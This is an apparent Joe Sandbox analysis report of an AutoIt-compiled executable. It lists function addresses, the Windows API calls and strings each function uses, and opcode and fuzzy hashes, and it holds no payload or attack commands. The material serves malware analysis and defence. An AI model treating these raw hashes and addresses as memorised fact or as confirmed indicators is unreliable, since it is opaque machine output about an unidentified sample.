                                                          • API String ID: 129472671-2362178303
                                                          • Opcode ID: 753bf222a7e2c13856f8cda262024905f554f58d086a9d507e402b694298352f
                                                          • Instruction ID: eba03b280a11003fdc6a9286bee5dc4be148e8c4d76ee30dc6b0ef24d6056e8c
                                                          • Opcode Fuzzy Hash: 753bf222a7e2c13856f8cda262024905f554f58d086a9d507e402b694298352f
                                                          • Instruction Fuzzy Hash: C5418D30278207ABDB167F649C8DBBE36A9F749300F140515F981921A2CFF29CF29B61

                                                          Control-flow Graph

                                                          APIs
                                                          • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 002A0C5B
                                                            • Part of subcall function 00261821: _memmove.LIBCMT ref: 0026185B
                                                          • _memset.LIBCMT ref: 00265787
                                                          • _wcscpy.LIBCMT ref: 002657DB
                                                          • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 002657EB
                                                          • __swprintf.LIBCMT ref: 002A0CD1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: IconLoadNotifyShell_String__swprintf_memmove_memset_wcscpy
                                                          • String ID: Line %d: $AutoIt -
                                                          • API String ID: 230667853-4094128768
                                                          • Opcode ID: 59213d1697aa2c0cccc36371599d28361eab6105e7575dee243ee745a1d872bc
                                                          • Instruction ID: 319f0e8fdd0d770c8f9cfc64e909bc5e15aab582a7ef7b6b39d197538b87e5e0
                                                          • Opcode Fuzzy Hash: 59213d1697aa2c0cccc36371599d28361eab6105e7575dee243ee745a1d872bc
                                                          • Instruction Fuzzy Hash: 55418471428301AAD322EB60DC85BDF77ECAF45350F144A1EF585920A1DF70A6A9CB97

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 002707BB: MapVirtualKeyW.USER32(0000005B,00000000), ref: 002707EC
                                                            • Part of subcall function 002707BB: MapVirtualKeyW.USER32(00000010,00000000), ref: 002707F4
                                                            • Part of subcall function 002707BB: MapVirtualKeyW.USER32(000000A0,00000000), ref: 002707FF
                                                            • Part of subcall function 002707BB: MapVirtualKeyW.USER32(000000A1,00000000), ref: 0027080A
                                                            • Part of subcall function 002707BB: MapVirtualKeyW.USER32(00000011,00000000), ref: 00270812
                                                            • Part of subcall function 002707BB: MapVirtualKeyW.USER32(00000012,00000000), ref: 0027081A
                                                            • Part of subcall function 0026FF4C: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0025AC6B), ref: 0026FFA7
                                                          • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0025AD08
                                                          • OleInitialize.OLE32(00000000), ref: 0025AD85
                                                          • CloseHandle.KERNEL32(00000000), ref: 00292F56
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                          • String ID: <w1$\t1$s1
                                                          • API String ID: 1986988660-884850715
                                                          • Opcode ID: 3bab7150e26b9016b6d50a480449a2ad2c5774de89bfb7fa4824d413860131a7
                                                          • Instruction ID: bd415d89ee234d44c9d514fbc996ee4ac5ad3f4d6fd1ab2cee23f79e75ec4d48
                                                          • Opcode Fuzzy Hash: 3bab7150e26b9016b6d50a480449a2ad2c5774de89bfb7fa4824d413860131a7
                                                          • Instruction Fuzzy Hash: F781DAB49682808ED38AEF2AED842E57FFDEB4C304B18C56AD419C72B2EB3004558F54

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1314 2650db-26514b CreateWindowExW * 2 ShowWindow * 2
                                                          APIs
                                                          • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00265109
                                                          • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 0026512A
                                                          • ShowWindow.USER32(00000000), ref: 0026513E
                                                          • ShowWindow.USER32(00000000), ref: 00265147
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Window$CreateShow
                                                          • String ID: AutoIt v3$edit
                                                          • API String ID: 1584632944-3779509399
                                                          • Opcode ID: f1c8b78c6dc61182e8b28e71e713a538b8be205d9dbc3d494516d62ea2d43c02
                                                          • Instruction ID: 915a7a9a680d5da9f56afb06e4a9dbfddf485245d727250ded497fefa0e3708b
                                                          • Opcode Fuzzy Hash: f1c8b78c6dc61182e8b28e71e713a538b8be205d9dbc3d494516d62ea2d43c02
                                                          • Instruction Fuzzy Hash: 9CF03A715842947EEA321B236C8CEA72E7DD7CAF10F04841AB900A61B0C6B11893CAB0

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1315 2b9b16-2b9b9b call 264a8c call 2b9cf1 1320 2b9b9d 1315->1320 1321 2b9ba5-2b9c5c call 264ab2 * 4 call 264a8c call 27593c * 2 call 264ab2 call 2b96c4 call 2b8f0e 1315->1321 1322 2b9b9f-2b9ba0 1320->1322 1344 2b9c5e-2b9c6e call 272f85 * 2 1321->1344 1345 2b9c73-2b9c77 1321->1345 1324 2b9ce8-2b9cee 1322->1324 1344->1322 1347 2b9c79-2b9cd1 call 2b90c1 call 272f85 1345->1347 1348 2b9cd8-2b9cde call 272f85 1345->1348 1358 2b9cd6 1347->1358 1357 2b9ce0-2b9ce6 1348->1357 1357->1324 1358->1357
                                                          APIs
                                                            • Part of subcall function 00264A8C: _fseek.LIBCMT ref: 00264AA4
                                                            • Part of subcall function 002B9CF1: _wcscmp.LIBCMT ref: 002B9DE1
                                                            • Part of subcall function 002B9CF1: _wcscmp.LIBCMT ref: 002B9DF4
                                                          • _free.LIBCMT ref: 002B9C5F
                                                          • _free.LIBCMT ref: 002B9C66
                                                          • _free.LIBCMT ref: 002B9CD1
                                                            • Part of subcall function 00272F85: RtlFreeHeap.NTDLL(00000000,00000000,?,00279C54,00000000,00278D5D,002759C3), ref: 00272F99
                                                            • Part of subcall function 00272F85: GetLastError.KERNEL32(00000000,?,00279C54,00000000,00278D5D,002759C3), ref: 00272FAB
                                                          • _free.LIBCMT ref: 002B9CD9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                          • String ID: >>>AUTOIT SCRIPT<<<
                                                          • API String ID: 1552873950-2806939583
                                                          • Opcode ID: e8d7cff71c4c7639e8c43d5bdce185cf227744023f01335ea16bc7ab6fa4bfb9
                                                          • Instruction ID: 2e0a44dbcde393885de9d25cd7c834b8dcc832ec7d61117e13c5b80e2a04330f
                                                          • Opcode Fuzzy Hash: e8d7cff71c4c7639e8c43d5bdce185cf227744023f01335ea16bc7ab6fa4bfb9
                                                          • Instruction Fuzzy Hash: 405148B1914219AFDB24DFA4DC81AEEBBB9FF48304F10409EF249A3241DB715E948F58
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                          • String ID:
                                                          • API String ID: 1559183368-0
                                                          • Opcode ID: 00b866a24d890f7fe79ae922164f866efed2fee1f991de586a4896b02612db73
                                                          • Instruction ID: 4395ed3e4599604cc18bd94377fb26265c41cc30aa050baca7c27679e47a1741
                                                          • Opcode Fuzzy Hash: 00b866a24d890f7fe79ae922164f866efed2fee1f991de586a4896b02612db73
                                                          • Instruction Fuzzy Hash: F851B930A21B16DBDB289F69C88566EF7A5AF40320F24C729F82D961D0D7F09D709F40
                                                          APIs
                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 002552E6
                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0025534A
                                                          • TranslateMessage.USER32(?), ref: 00255356
                                                          • DispatchMessageW.USER32(?), ref: 00255360
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Message$Peek$DispatchTranslate
                                                          • String ID:
                                                          • API String ID: 1795658109-0
                                                          • Opcode ID: d87cb6ab5ebb443e280b404063b57ed8ab956894ce23b359a9fc2b4edc8c37ec
                                                          • Instruction ID: 87b4af01a37bcb35fb530a0ac081afbe917e1cb0d7178ca9d609d18bfb26ade7
                                                          • Opcode Fuzzy Hash: d87cb6ab5ebb443e280b404063b57ed8ab956894ce23b359a9fc2b4edc8c37ec
                                                          • Instruction Fuzzy Hash: CF314630968702ABDB318F64DC54BF537F89B15301F284099E916871E0D3F098AEE715
                                                          APIs
                                                          • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00251275,SwapMouseButtons,00000004,?), ref: 002512A8
                                                          • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00251275,SwapMouseButtons,00000004,?), ref: 002512C9
                                                          • RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,00251275,SwapMouseButtons,00000004,?), ref: 002512EB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: CloseOpenQueryValue
                                                          • String ID: Control Panel\Mouse
                                                          • API String ID: 3677997916-824357125
                                                          • Opcode ID: 423e604490a6cde5a0258ad0e59d774d3bc0aeb23563bdfecc59d12441560de7
                                                          • Instruction ID: 0daf5b7652cdb21b0af42c3bfc6efc828c3eb4a703421955fdfd14178c245731
                                                          • Opcode Fuzzy Hash: 423e604490a6cde5a0258ad0e59d774d3bc0aeb23563bdfecc59d12441560de7
                                                          • Instruction Fuzzy Hash: 8A114871920218BFDB20CFA4DC84FBEBBA8EF04742F004559EC05D7110D2719E6497A4
                                                          APIs
                                                            • Part of subcall function 0027593C: __FF_MSGBANNER.LIBCMT ref: 00275953
                                                            • Part of subcall function 0027593C: __NMSG_WRITE.LIBCMT ref: 0027595A
                                                            • Part of subcall function 0027593C: RtlAllocateHeap.NTDLL(016E0000,00000000,00000001,?,00000004,?,?,00271003,?), ref: 0027597F
                                                          • std::exception::exception.LIBCMT ref: 0027101C
                                                          • __CxxThrowException@8.LIBCMT ref: 00271031
                                                            • Part of subcall function 002787CB: RaiseException.KERNEL32(?,?,?,0030CAF8,?,?,?,?,?,00271036,?,0030CAF8,?,00000001), ref: 00278820
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                          • String ID: `=.$h=.
                                                          • API String ID: 3902256705-258339085
                                                          • Opcode ID: cbbae9ef702eb7a33658652078c01272732016b2ec04c80d05f6a9558d157bad
                                                          • Instruction ID: 54c606bfbc4ed85d64f6a2879d3eb80c955a85640c17c45943c85cee92e23d71
                                                          • Opcode Fuzzy Hash: cbbae9ef702eb7a33658652078c01272732016b2ec04c80d05f6a9558d157bad
                                                          • Instruction Fuzzy Hash: 77F0F43457421EE2CB20EA98DC199DEB7AC9F01310F508055FD0C92181DFB09BB0CAE1
                                                          APIs
                                                          • GetFileAttributesW.KERNEL32(?,002E2C4C), ref: 002B3F57
                                                          • GetLastError.KERNEL32 ref: 002B3F66
                                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 002B3F75
                                                          • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,002E2C4C), ref: 002B3FD2
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: CreateDirectory$AttributesErrorFileLast
                                                          • String ID:
                                                          • API String ID: 2267087916-0
                                                          • Opcode ID: 57ca252f61f8d26012a55b17968d626367b7e1c7e1f95fbd1ad997108ea86a84
                                                          • Instruction ID: 900cd343c892dc5e1cc992e50c34b4ab6c09b992db28f1dee5f286584d60cf06
                                                          • Opcode Fuzzy Hash: 57ca252f61f8d26012a55b17968d626367b7e1c7e1f95fbd1ad997108ea86a84
                                                          • Instruction Fuzzy Hash: 822191709692019F8700DF28D8C58AEB7F4BE593A4F144A1DF499C76A1D730DAAACF42
                                                          APIs
                                                          • _memset.LIBCMT ref: 00265B58
                                                            • Part of subcall function 002656F8: _memset.LIBCMT ref: 00265787
                                                            • Part of subcall function 002656F8: _wcscpy.LIBCMT ref: 002657DB
                                                            • Part of subcall function 002656F8: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 002657EB
                                                          • KillTimer.USER32(?,00000001,?,?), ref: 00265BAD
                                                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00265BBC
                                                          • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 002A0D7C
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                          • String ID:
                                                          • API String ID: 1378193009-0
                                                          • Opcode ID: c1d59446ae18ffc2a8c61581fd944aaf01949dee620bba4de55c4d98cf3b67c7
                                                          • Instruction ID: d55221d8f963cc1044881a16b607bbcdde140c13ae7eebb2491c571180ea43c4
                                                          • Opcode Fuzzy Hash: c1d59446ae18ffc2a8c61581fd944aaf01949dee620bba4de55c4d98cf3b67c7
                                                          • Instruction Fuzzy Hash: 29214971524B949FE7728B64C8D9FEABBECEF02308F04048DE68A56181C7B029D5CB41
                                                          APIs
                                                            • Part of subcall function 002649C2: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,002627AF,?,00000001), ref: 002649F4
                                                          • _free.LIBCMT ref: 0029FB04
                                                          • _free.LIBCMT ref: 0029FB4B
                                                            • Part of subcall function 002629BE: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00262ADF
                                                          Strings
                                                          • Bad directive syntax error, xrefs: 0029FB33
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: _free$CurrentDirectoryLibraryLoad
                                                          • String ID: Bad directive syntax error
                                                          • API String ID: 2861923089-2118420937
                                                          • Opcode ID: 519432a1a0662c322c27cfc945ae7d8d662e7bf6e08815dd63a594326df66d56
                                                          • Instruction ID: 719b143fb7aca0d66763f352ac963aaf83ff9950e144c7f418b1443c726416f9
                                                          • Opcode Fuzzy Hash: 519432a1a0662c322c27cfc945ae7d8d662e7bf6e08815dd63a594326df66d56
                                                          • Instruction Fuzzy Hash: 72916C71920219AFCF44EFA4C9919EEB7B4BF09314F14442AE816EB291DB70A965CF50
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: _memmove
                                                          • String ID: AU3! ?.$EA06
                                                          • API String ID: 4104443479-2891994544
                                                          • Opcode ID: 34818efcef1a275741acf36d2035232c74397bfc3c5d4e86e484426e72df9927
                                                          • Instruction ID: 8e3f26cae1d742da585a446f2bc7142b921cb38d7b824105aca68d54fd96c6ff
                                                          • Opcode Fuzzy Hash: 34818efcef1a275741acf36d2035232c74397bfc3c5d4e86e484426e72df9927
                                                          • Instruction Fuzzy Hash: 1C416B21A751985BDF21AF648C917BF7BA18F46300F684075E8C2A7286CA649DF487E1
                                                          APIs
                                                            • Part of subcall function 00264AB2: __fread_nolock.LIBCMT ref: 00264AD0
                                                          • _wcscmp.LIBCMT ref: 002B9DE1
                                                          • _wcscmp.LIBCMT ref: 002B9DF4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: _wcscmp$__fread_nolock
                                                          • String ID: FILE
                                                          • API String ID: 4029003684-3121273764
                                                          • Opcode ID: ce74ca86a60915105f0d0510c3ed98fb61f510fe552dc2b5e8eb0a8eae741f35
                                                          • Instruction ID: 71eb4ecadd42aa9894bbece2a63a48f97f130409bce5a7ac344c963e113d75ef
                                                          • Opcode Fuzzy Hash: ce74ca86a60915105f0d0510c3ed98fb61f510fe552dc2b5e8eb0a8eae741f35
                                                          • Instruction Fuzzy Hash: 21411871A1020ABADF21EEE0CC45FEFB7BDDF45710F00406AFA00A7281D6719D948BA4
                                                          APIs
                                                          • _memset.LIBCMT ref: 002A032B
                                                          • GetOpenFileNameW.COMDLG32(?), ref: 002A0375
                                                            • Part of subcall function 00270284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00262A58,?,00008000), ref: 002702A4
                                                            • Part of subcall function 002709C5: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 002709E4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Name$Path$FileFullLongOpen_memset
                                                          • String ID: X
                                                          • API String ID: 3777226403-3081909835
                                                          • Opcode ID: 986b75503aa33d92bd2164870dc25dec20ab24f0c3b5ca8f5157bcfa7f0e1c5b
                                                          • Instruction ID: 42b92fe32423a6dfe9090c53e27503fe44f45b644af57e1de5c7bdbaafb36ce1
                                                          • Opcode Fuzzy Hash: 986b75503aa33d92bd2164870dc25dec20ab24f0c3b5ca8f5157bcfa7f0e1c5b
                                                          • Instruction Fuzzy Hash: B821A571A212889BDF41DF94D845BEE7BFCAF49304F00405AE408A7281DBF55A9DDFA1
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 52bf12bb1d4979301b042ab074d025e7caaff174a26efcf1db3d9f42f9cc2ea7
                                                          • Instruction ID: 7bf3ed01478cf35aae3bb6251974802ca863252bbf1b4435694efd7ebfdc79bc
                                                          • Opcode Fuzzy Hash: 52bf12bb1d4979301b042ab074d025e7caaff174a26efcf1db3d9f42f9cc2ea7
                                                          • Instruction Fuzzy Hash: CEF126716183419FC714DF28C484A6ABBE5FF88318F148A2EF8999B351D770E955CF82
                                                          APIs
                                                          • _memset.LIBCMT ref: 002659F9
                                                          • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00265A9E
                                                          • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00265ABB
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
